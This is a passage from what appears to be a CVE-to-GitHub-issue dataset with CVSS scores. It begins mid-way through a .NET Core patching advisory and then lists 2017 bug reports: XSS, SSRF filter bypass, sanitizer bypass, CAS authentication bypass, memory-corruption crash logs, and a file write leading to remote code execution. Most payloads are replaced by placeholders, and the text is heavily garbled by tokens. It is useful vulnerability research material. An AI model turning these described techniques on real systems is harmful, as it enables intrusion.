NUMBERTAG If you are using version NUMBERTAG or NUMBERTAG you should update your package version to NUMBERTAG This will update every MVC package to the fixed versions. Fixing Direct Dependencies \u2013 FILETAG /VS NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . 
 APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Fixing Direct Dependencies \u2013 csproj/VS NUMBERTAG Open your APITAG file in your editor, or right click the project in Visual Studio NUMBERTAG and choose APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an example project file: CODETAG The example has two direct package dependencies, as seen by the two APITAG elements. The name of the package is in the Include attribute, and the package version number is in the Version attribute that is exposed to the right of the package name. The example shows two packages APITAG version NUMBERTAG and APITAG version NUMBERTAG Review your APITAG elements for any instance of the packages and versions listed above. 
In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package version, save your csproj file. The example csproj would now look as follows: CODETAG If you are using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning, you must update your other direct dependencies to the appropriate version. For example if your project refers to APITAG with a version number of NUMBERTAG when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your csproj or APITAG in the same way that you used to update the vulnerable package versions. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Reviewing Transitive Dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review your APITAG ( FILETAG /VS NUMBERTAG or APITAG (csproj/VS NUMBERTAG file. Using Visual Studio Solution Explorer (VS NUMBERTAG If you want to use Visual Studio NUMBERTAG open your project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. 
Search for each of the vulnerable package names and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a reference to APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see we have found references to APITAG , version NUMBERTAG ERRORTAG APITAG APITAG APITAG or .NET Framework vX.Y.Z ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In this case the APITAG package takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG ERRORTAG FILETAG APITAG FILETAG file to expand the solution tree to expose the FILETAG file. The following image shows a project with the FILETAG file expanded to show the FILETAG APITAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. For example a search result that shows APITAG APITAG APITAG APITAG FILETAG CODETAG FILETAG file to override the transitive dependency. Open your FILETAG CODETAG FILETAG file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG APITAG FILETAG APITAG APITAG file. If you are using Visual Studio save your updated APITAG CODETAG dotnet restore CODETAG APITAG in an example project that contains a package that takes a dependency on APITAG CODETAG APITAG ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In the example the APITAG package takes a dependency on a version of APITAG which in turn takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. 
 For example a search result that shows APITAG APITAG APITAG APITAG FILETAG file includes references to any of the vulnerable packages shown above then you will need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open your APITAG APITAG APITAG from the context menu, where projectname is the name of your project. Look for APITAG CODETAG csproj file. You do this by adding a new line to the dependencies section, referring to the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG CODETAG csproj file. If you are using Visual Studio, save your updated csproj CODETAG dotnet restore` command to restore your new dependencies. Rebuilding your application Finally rebuild your application, test as you would do normally and redeploy using your favored deployment mechanism. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Revisions NUMBERTAG APITAG NUMBERTAG Advisory published.",
  4429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4430. "severity": "HIGH",
  4431. "baseScore": 7.5,
  4432. "impactScore": 3.6,
  4433. "exploitabilityScore": 3.9
  4434. },
  4435. {
  4436. "CVE_ID": "CVE-2017-0378",
  4437. "Issue_Url_old": "https://github.com/lota/phamm/issues/21",
  4438. "Issue_Url_new": "https://github.com/lota/phamm/issues/21",
  4439. "Repo_new": "lota/phamm",
  4440. "Issue_Created_At": "2017-07-19T23:59:54Z",
  4441. "description": "CVETAG reflected XSS. While looking through APITAG I noticed that phamm's FILETAG uses $_SERVER['PHP_SELF'] in a way that is vulnerable to reflected XSS attacks. To reproduce the problem, load a URL like this in Firefox: URLTAG The Debian Security team assigned this issue CVETAG",
  4442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4443. "severity": "MEDIUM",
  4444. "baseScore": 6.1,
  4445. "impactScore": 2.7,
  4446. "exploitabilityScore": 2.8
  4447. },
  4448. {
  4449. "CVE_ID": "CVE-2017-0898",
  4450. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3722",
  4451. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3722",
  4452. "Repo_new": "mruby/mruby",
  4453. "Issue_Created_At": "2017-06-26T18:16:07Z",
  4454. "description": "Heap use after free in mrb_str_format. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by URLTAG",
  4455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  4456. "severity": "CRITICAL",
  4457. "baseScore": 9.1,
  4458. "impactScore": 5.2,
  4459. "exploitabilityScore": 3.9
  4460. },
  4461. {
  4462. "CVE_ID": "CVE-2017-0904",
  4463. "Issue_Url_old": "https://github.com/jtdowney/private_address_check/issues/1",
  4464. "Issue_Url_new": "https://github.com/jtdowney/private_address_check/issues/1",
  4465. "Repo_new": "jtdowney/private_address_check",
  4466. "Issue_Created_At": "2017-11-07T10:54:06Z",
  4467. "description": "Resolv::getaddresses bug allows one to bypass your SSRF filter. Description APITAG is OS dependent, therefore by playing around with different IP formats one can make it return blank values. This bug can be abused to bypass your exclusion list. | \ud83d\udcbb Machine NUMBERTAG Machine NUMBERTAG ruby NUMBERTAG p NUMBERTAG linux gnu] | ruby NUMBERTAG p NUMBERTAG linux gnu] | \ud83d\udcbb Machine NUMBERTAG CODETAG \ud83d\udcbb Machine NUMBERTAG CODETAG Proof of concept CODETAG Mitigation I suggest staying away from APITAG altogether and using the Socket class. APITAG",
  4468. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4469. "severity": "HIGH",
  4470. "baseScore": 8.1,
  4471. "impactScore": 5.9,
  4472. "exploitabilityScore": 2.2
  4473. },
  4474. {
  4475. "CVE_ID": "CVE-2017-0928",
  4476. "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/35",
  4477. "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/35",
  4478. "Repo_new": "guardian/html-janitor",
  4479. "Issue_Created_At": "2017-10-27T10:01:25Z",
  4480. "description": "Bypassing sanitization using DOM clobbering. Proof of concept: CODETAG The following check can be leveraged to bypass the whole sanitization process: APITAG As node is the first child in the created tree walker, i.e. in this case the APITAG tag, APITAG will point to the inner APITAG and the check passes. To learn more about DOM clobbering see: URLTAG (by Mario Heiderich)",
  4481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4482. "severity": "MEDIUM",
  4483. "baseScore": 6.1,
  4484. "impactScore": 2.7,
  4485. "exploitabilityScore": 2.8
  4486. },
  4487. {
  4488. "CVE_ID": "CVE-2017-0931",
  4489. "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/34",
  4490. "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/34",
  4491. "Repo_new": "guardian/html-janitor",
  4492. "Issue_Created_At": "2017-10-27T09:49:19Z",
  4493. "description": "Passing user controlled data to APITAG may lead to XSS. The following will result in JS execution: ERRORTAG because of this code: ERRORTAG This implies that passing untrusted user controlled data into the clean method can be very dangerous in some cases. The APITAG HTML\" description seems to imply that \"dirty\" HTML is expected, and therefore I would assume the clean method should never result in arbitrary JS being executed.",
  4494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4495. "severity": "MEDIUM",
  4496. "baseScore": 6.1,
  4497. "impactScore": 2.7,
  4498. "exploitabilityScore": 2.8
  4499. },
  4500. {
  4501. "CVE_ID": "CVE-2017-1000007",
  4502. "Issue_Url_old": "https://github.com/twisted/txaws/issues/24",
  4503. "Issue_Url_new": "https://github.com/twisted/txaws/issues/24",
  4504. "Repo_new": "twisted/txaws",
  4505. "Issue_Created_At": "2017-01-07T01:56:23Z",
  4506. "description": "security placeholder.",
  4507. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4508. "severity": "MEDIUM",
  4509. "baseScore": 5.9,
  4510. "impactScore": 3.6,
  4511. "exploitabilityScore": 2.2
  4512. },
  4513. {
  4514. "CVE_ID": "CVE-2017-1000048",
  4515. "Issue_Url_old": "https://github.com/ljharb/qs/issues/200",
  4516. "Issue_Url_new": "https://github.com/ljharb/qs/issues/200",
  4517. "Repo_new": "ljharb/qs",
  4518. "Issue_Created_At": "2017-03-02T11:19:08Z",
  4519. "description": "prototype override protection bypass problem still exists. The bug reported in URLTAG was fixed, but the other bypass, APITAG, still exists.",
  4520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4521. "severity": "HIGH",
  4522. "baseScore": 7.5,
  4523. "impactScore": 3.6,
  4524. "exploitabilityScore": 3.9
  4525. },
  4526. {
  4527. "CVE_ID": "CVE-2017-1000056",
  4528. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/43459",
  4529. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/43459",
  4530. "Repo_new": "kubernetes/kubernetes",
  4531. "Issue_Created_At": "2017-03-21T15:22:29Z",
  4532. "description": "placeholder. placeholder",
  4533. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4534. "severity": "CRITICAL",
  4535. "baseScore": 9.8,
  4536. "impactScore": 5.9,
  4537. "exploitabilityScore": 3.9
  4538. },
  4539. {
  4540. "CVE_ID": "CVE-2017-1000070",
  4541. "Issue_Url_old": "https://github.com/bitly/oauth2_proxy/issues/228",
  4542. "Issue_Url_new": "https://github.com/bitly/oauth2_proxy/issues/228",
  4543. "Repo_new": "bitly/oauth2_proxy",
  4544. "Issue_Created_At": "2016-03-26T16:07:36Z",
  4545. "description": "'/' redirect check isn't enough. PATHTAG is a valid URL, so the redirect check at APITAG is not sufficient for its intent: a value that passes the leading '/' check can still send the browser to another host. Since I'm using this hole to redirect to other domains within a set of subdomains it would be cool if this was somehow preserved so I can have a partially open redirect. (I'm using an 'auth' domain and redirect to it from other domains and then redirect back while using the nginx auth setup; I plan on writing up the configuration soon for others to use.)",
  4546. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4547. "severity": "MEDIUM",
  4548. "baseScore": 6.1,
  4549. "impactScore": 2.7,
  4550. "exploitabilityScore": 2.8
  4551. },
  4552. {
  4553. "CVE_ID": "CVE-2017-1000071",
  4554. "Issue_Url_old": "https://github.com/Jasig/phpCAS/issues/228",
  4555. "Issue_Url_new": "https://github.com/apereo/phpcas/issues/228",
  4556. "Repo_new": "apereo/phpcas",
  4557. "Issue_Created_At": "2017-04-06T14:17:04Z",
  4558. "description": "Authentication bypass in APITAG Hello, I found a way to abuse the failure message from an old CAS server to bypass authentication, even if the latest APITAG is used. The CAS NUMBERTAG validation function is like this: ERRORTAG A normal APITAG message is like this: CODETAG In old CAS server versions, it was possible to inject an xml tag in the ticket so that the failure message becomes: CODETAG Now check the php code above and guess what happens: authentication success! The client only looks for the success element and ignores the authenticationFailure elements, so a failure response carrying an injected success tag is accepted. Again, this is only possible when the latest APITAG is configured to authenticate against an old CAS server. Still, that configuration does exist. Some other CAS clients might also be vulnerable, I didn't verify though.",
  4559. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4560. "severity": "HIGH",
  4561. "baseScore": 8.1,
  4562. "impactScore": 5.9,
  4563. "exploitabilityScore": 2.2
  4564. },
  4565. {
  4566. "CVE_ID": "CVE-2017-1000072",
  4567. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/123",
  4568. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/123",
  4569. "Repo_new": "marcobambini/gravity",
  4570. "Issue_Created_At": "2017-04-07T05:59:36Z",
  4571. "description": "Double Free Vulnerability . I found a Double Free vulnerability while fuzzing Gravity. I have attached the Valgrind output as well. FILETAG ASAN output: > $ PATHTAG PATHTAG > RUNTIME ERROR: Unable to find f2 into class foo NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG e NUMBERTAG in thread T NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG NUMBERTAG cc7 in gravity_class_free_core PATHTAG NUMBERTAG in gravity_core_free PATHTAG NUMBERTAG a9b1 in main PATHTAG NUMBERTAG f NUMBERTAG b5ef NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG > freed by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG > > previously allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e2 in string_dup PATHTAG > > SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING POC: 'WILL ADD' MENTIONTAG",
  4572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4573. "severity": "CRITICAL",
  4574. "baseScore": 9.8,
  4575. "impactScore": 5.9,
  4576. "exploitabilityScore": 3.9
  4577. },
  4578. {
  4579. "CVE_ID": "CVE-2017-1000073",
  4580. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/129",
  4581. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/129",
  4582. "Repo_new": "marcobambini/gravity",
  4583. "Issue_Created_At": "2017-04-10T14:07:16Z",
  4584. "description": "Heap Overflow / Corruption. ERRORTAG Valgrind: ERRORTAG Can provide test case if need be.",
  4585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4586. "severity": "CRITICAL",
  4587. "baseScore": 9.8,
  4588. "impactScore": 5.9,
  4589. "exploitabilityScore": 3.9
  4590. },
  4591. {
  4592. "CVE_ID": "CVE-2017-1000074",
  4593. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/131",
  4594. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/131",
  4595. "Repo_new": "marcobambini/gravity",
  4596. "Issue_Created_At": "2017-04-10T22:43:02Z",
  4597. "description": "Stack Overflow APITAG \\ strcpy). There is a stack based buffer overflow in the APITAG function in gravity_core.c. Using the testcase below an attacker can overflow the integers of APITAG as well, use the var to gain complete control of the program's memory. Attached is the Valgrind, ASAN, and GDB output. Would recommend not using strcpy or memcpy unless you can ensure that bounds are being checked on both the dest and src strings. APITAG Valgrind NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gravity PATHTAG NUMBERTAG Warning: client switching stacks? SP change NUMBERTAG ffeffe NUMBERTAG f0f NUMBERTAG to suppress, use: max stackframe NUMBERTAG or greater NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), 
you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault (core dumped) ASAN: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffd0a2a NUMBERTAG pc NUMBERTAG d bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd0a2a NUMBERTAG T NUMBERTAG c in string_repeat ( PATHTAG NUMBERTAG bbcb in gravity_vm_exec ( PATHTAG NUMBERTAG fc NUMBERTAG in gravity_vm_runmain ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG a2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG stack overflow NUMBERTAG string_repeat GDB: [ registers ] RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RSI NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) 
RDI NUMBERTAG fff NUMBERTAG d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d ( APITAG : call NUMBERTAG APITAG ) R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG APITAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG APITAG : sub rsp,ra NUMBERTAG APITAG : mov rdi,rsp NUMBERTAG a APITAG : mov r NUMBERTAG rsp NUMBERTAG d APITAG : call NUMBERTAG APITAG NUMBERTAG APITAG : mov rcx,QWORD PTR [rbp NUMBERTAG APITAG : lea rax,[rc NUMBERTAG d APITAG : cmp rc NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rax Guessed arguments: arg NUMBERTAG fff NUMBERTAG d0 arg NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) [ stack ] Invalid $SP address NUMBERTAG fff NUMBERTAG d0 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG d in string_repeat () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA APITAG RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RDI NUMBERTAG fff NUMBERTAG d0 RSI NUMBERTAG d6e NUMBERTAG AAAAAAAA') R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d0 \u25c2\u2014 ... 
RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d (string_repeat NUMBERTAG call NUMBERTAG APITAG NUMBERTAG d APITAG call strcpy MENTIONTAG APITAG dest NUMBERTAG fff NUMBERTAG d0 src NUMBERTAG d6e NUMBERTAG AAAAAAAA NUMBERTAG APITAG mov rcx, qword ptr [rbp NUMBERTAG APITAG lea rax, [rc NUMBERTAG d APITAG cmp rc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG APITAG je string_repeat NUMBERTAG APITAG NUMBERTAG a APITAG nop word ptr [rax + ra NUMBERTAG APITAG mov rsi, qword ptr [r NUMBERTAG APITAG mov rdi, r NUMBERTAG APITAG add rb NUMBERTAG b APITAG call strcat MENTIONTAG APITAG APITAG APITAG not read memory at NUMBERTAG fff NUMBERTAG d0> APITAG \u25ba f NUMBERTAG d string_repeat NUMBERTAG f NUMBERTAG bbcc gravity_vm_exec NUMBERTAG f NUMBERTAG fc NUMBERTAG gravity_vm_runmain NUMBERTAG f NUMBERTAG main NUMBERTAG f NUMBERTAG ffff NUMBERTAG d NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGSEGV (fault address NUMBERTAG fff NUMBERTAG c8)",
  4598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4599. "severity": "CRITICAL",
  4600. "baseScore": 9.8,
  4601. "impactScore": 5.9,
  4602. "exploitabilityScore": 3.9
  4603. },
  4604. {
  4605. "CVE_ID": "CVE-2017-1000075",
  4606. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/133",
  4607. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/133",
  4608. "Repo_new": "marcobambini/gravity",
  4609. "Issue_Created_At": "2017-04-11T12:43:15Z",
  4610. "description": "Stack overflow (memcmp). GDB: CODETAG POC: ERRORTAG",
  4611. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4612. "severity": "CRITICAL",
  4613. "baseScore": 9.8,
  4614. "impactScore": 5.9,
  4615. "exploitabilityScore": 3.9
  4616. },
  4617. {
  4618. "CVE_ID": "CVE-2017-1000082",
  4619. "Issue_Url_old": "https://github.com/systemd/systemd/issues/6237",
  4620. "Issue_Url_new": "https://github.com/systemd/systemd/issues/6237",
  4621. "Repo_new": "systemd/systemd",
  4622. "Issue_Created_At": "2017-06-29T06:30:08Z",
  4623. "description": "systemd can't handle the process privilege that belongs to a user name that starts with a number, such as NUMBERTAG day. Submission type Bug report systemd version the issue has been seen with > systemd NUMBERTAG Used distribution > Linux ubuntu NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Apr NUMBERTAG UTC NUMBERTAG APITAG In case of bug report: Expected behaviour you didn't see > The process started by systemd should run with the user's privilege In case of bug report: Unexpected behaviour you saw > The process started by systemd ran with root privilege, i.e. the configured user was not applied and the unit still started In case of bug report: Steps to reproduce the problem linux user's name : APITAG conf file: APITAG CODETAG and then use APITAG to start the process, but the privilege is root When I use xinetd to start the service, it starts with the linux user APITAG privilege",
  4624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4625. "severity": "CRITICAL",
  4626. "baseScore": 9.8,
  4627. "impactScore": 5.9,
  4628. "exploitabilityScore": 3.9
  4629. },
  4630. {
  4631. "CVE_ID": "CVE-2017-1000097",
  4632. "Issue_Url_old": "https://github.com/golang/go/issues/18141",
  4633. "Issue_Url_new": "https://github.com/golang/go/issues/18141",
  4634. "Repo_new": "golang/go",
  4635. "Issue_Created_At": "2016-12-01T16:38:39Z",
  4636. "description": "embargoed security issue. Placeholder for NUMBERTAG and NUMBERTAG security releases",
  4637. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4638. "severity": "HIGH",
  4639. "baseScore": 7.5,
  4640. "impactScore": 3.6,
  4641. "exploitabilityScore": 3.9
  4642. },
  4643. {
  4644. "CVE_ID": "CVE-2017-1000168",
  4645. "Issue_Url_old": "https://github.com/dnaq/sodiumoxide/issues/154",
  4646. "Issue_Url_new": "https://github.com/dnaq/sodiumoxide/issues/154",
  4647. "Repo_new": "dnaq/sodiumoxide",
  4648. "Issue_Created_At": "2017-01-26T12:39:20Z",
  4649. "description": "APITAG supports degenerate public keys (insecure). Currently APITAG accepts all-zero public keys, for which the result (the DH shared secret) will always be zero regardless of the private key used, so a peer can force a known shared secret. By contrast, libsodium's APITAG returns a non-zero value if it encounters such degenerate keys. You should therefore check its return value when calling APITAG and surface it as an error instead of returning the all-zero secret.",
  4650. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  4651. "severity": "MEDIUM",
  4652. "baseScore": 6.5,
  4653. "impactScore": 3.6,
  4654. "exploitabilityScore": 2.8
  4655. },
  4656. {
  4657. "CVE_ID": "CVE-2017-1000169",
  4658. "Issue_Url_old": "https://github.com/halojoy/QuickerBB/issues/10",
  4659. "Issue_Url_new": "https://github.com/halojoy/quickerbb/issues/10",
  4660. "Repo_new": "halojoy/QuickerBB",
  4661. "Issue_Created_At": "2017-04-28T12:28:12Z",
  4662. "description": "Arbitrary File Write Leading to RCE. Hi, I found that there is an arbitrary file write leading to remote code execution in APITAG (specifically in FILETAG ). The exact request that creates an RCE shell in FILETAG is given below: CODETAG install_step3.php writes to FILETAG without actually checking or sanitising what it writes. Also FILETAG is not blocked off by the .htaccess file, so anyone who has not removed the installation files is vulnerable to this attack. Remediation: I would suggest sanitising the input with something like htmlentities. There are many other ways of doing this, but this would be a quick and easy fix (note that htmlentities only neutralises HTML metacharacters; since the written file is executed as PHP, strictly validating the value before writing it is the more robust fix). Another extra layer would be adding the FILETAG file to the .htaccess deny list so it cannot be viewed. This ensures that even if the file-write protection is bypassed, the file cannot be executed by an unauthorised user.",
  4663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4664. "severity": "CRITICAL",
  4665. "baseScore": 9.8,
  4666. "impactScore": 5.9,
  4667. "exploitabilityScore": 3.9
  4668. },
  4669. {
  4670. "CVE_ID": "CVE-2017-1000170",
  4671. "Issue_Url_old": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
  4672. "Issue_Url_new": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
  4673. "Repo_new": "jqueryfiletree/jqueryfiletree",
  4674. "Issue_Created_At": "2017-05-09T01:06:27Z",
